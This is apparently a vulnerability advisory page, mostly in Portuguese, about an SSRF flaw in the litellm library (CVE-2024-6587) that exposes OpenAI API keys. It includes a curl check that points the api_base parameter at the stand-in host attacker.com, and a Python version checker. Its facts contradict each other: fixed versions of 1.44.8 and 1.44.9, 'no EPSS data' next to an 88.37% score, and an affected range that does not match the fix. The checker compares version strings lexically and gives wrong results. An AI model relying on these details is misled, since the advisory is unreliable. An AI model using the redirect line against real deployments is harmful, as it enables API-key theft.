Plataforma
python
Componente
litellm
Corrigido em
1.44.9
1.44.8
Uma vulnerabilidade de Server-Side Request Forgery (SSRF) foi identificada na biblioteca litellm, versões até 1.9.dev0. Essa falha permite que usuários maliciosos especifiquem o parâmetro api_base em requisições POST /chat/completions, direcionando a aplicação a enviar a requisição para um domínio controlado pelo atacante. Isso pode levar à interceptação da chave da API OpenAI, comprometendo a segurança e a confidencialidade dos dados.
A exploração bem-sucedida desta vulnerabilidade SSRF permite que um atacante intercepte a chave da API OpenAI utilizada pela aplicação litellm. Ao manipular o parâmetro api_base, o atacante pode redirecionar as requisições da aplicação para seu próprio servidor, capturando a chave da API incluída na requisição. Com a posse da chave da API, o atacante pode realizar ações não autorizadas, como acessar dados confidenciais, gerar conteúdo fraudulento ou realizar ataques de negação de serviço, tudo sob a identidade da aplicação legítima. A amplitude do impacto é significativa, pois a chave da API concede acesso completo aos recursos da OpenAI associados à conta.
A vulnerabilidade foi divulgada em 13 de setembro de 2024. Não há informações disponíveis sobre a inclusão desta CVE no KEV (CISA Known Exploited Vulnerabilities) ou sobre a pontuação EPSS (Exploit Prediction Scoring System). Atualmente, não há Proof-of-Concept (PoC) publicamente disponíveis, mas a natureza da vulnerabilidade SSRF sugere que a exploração pode ser relativamente simples para atacantes com conhecimento técnico.
Applications utilizing the berriai/litellm library, particularly those integrated with OpenAI services, are at risk. Environments where the api_base parameter is not properly validated or sanitized are especially vulnerable. Shared hosting environments where multiple users might interact with the litellm application are also at increased risk.
• python / library:
import os
import subprocess
def check_litellm_version():
try:
result = subprocess.check_output(['pip', 'show', 'litellm'], stderr=subprocess.STDOUT, text=True)
version_line = [line for line in result.splitlines() if 'Version:' in line]
if version_line:
version = version_line[0].split(': ')[1].strip()
if version <= '1.9.dev0':
print(f"[!] litellm version {version} is vulnerable to CVE-2024-6587. Upgrade to 1.44.8 or later.")
else:
print("[+] litellm version is not vulnerable.")
else:
print("[!] Could not determine litellm version.")
except FileNotFoundError:
print("[!] litellm is not installed.")
check_litellm_version()• generic web:
curl -I 'http://your-litellm-app/chat/completions?api_base=http://attacker.com' | grep api_basedisclosure
patch
Status do Exploit
EPSS
88.37% (percentil 99%)
CISA SSVC
Vetor CVSS
A mitigação primária para esta vulnerabilidade é a atualização para a versão 1.44.8 ou superior do litellm, que corrige a falha SSRF. Em ambientes onde a atualização imediata não é possível, considere implementar medidas de segurança adicionais, como restringir o acesso à API litellm apenas a fontes confiáveis e monitorar o tráfego de rede em busca de requisições suspeitas. Implementar regras em um Web Application Firewall (WAF) para bloquear requisições com parâmetros apibase inesperados também pode ajudar a reduzir o risco. Verifique se a configuração do litellm não permite a especificação livre do apibase.
Atualize a biblioteca litellm para a versão 1.44.9 ou superior. Isso corrige a vulnerabilidade SSRF que permite a usuários maliciosos interceptar a chave da API da OpenAI. Execute `pip install --upgrade litellm` para atualizar para a última versão.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2024-6587 é uma vulnerabilidade de Server-Side Request Forgery (SSRF) na biblioteca litellm, permitindo que atacantes interceptem a chave da API OpenAI.
Se você estiver utilizando uma versão do litellm inferior ou igual a 1.9.dev0, você está potencialmente afetado por esta vulnerabilidade.
A correção é atualizar para a versão 1.44.8 ou superior do litellm. Implemente medidas de segurança adicionais se a atualização imediata não for possível.
Atualmente, não há relatos de exploração ativa, mas a natureza da vulnerabilidade SSRF sugere que a exploração é possível.
Consulte o repositório oficial do litellm no GitHub para obter informações e atualizações sobre a vulnerabilidade: [https://github.com/berriai/litellm](https://github.com/berriai/litellm)
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.
Envie seu arquivo requirements.txt e descubra na hora se você está afetado.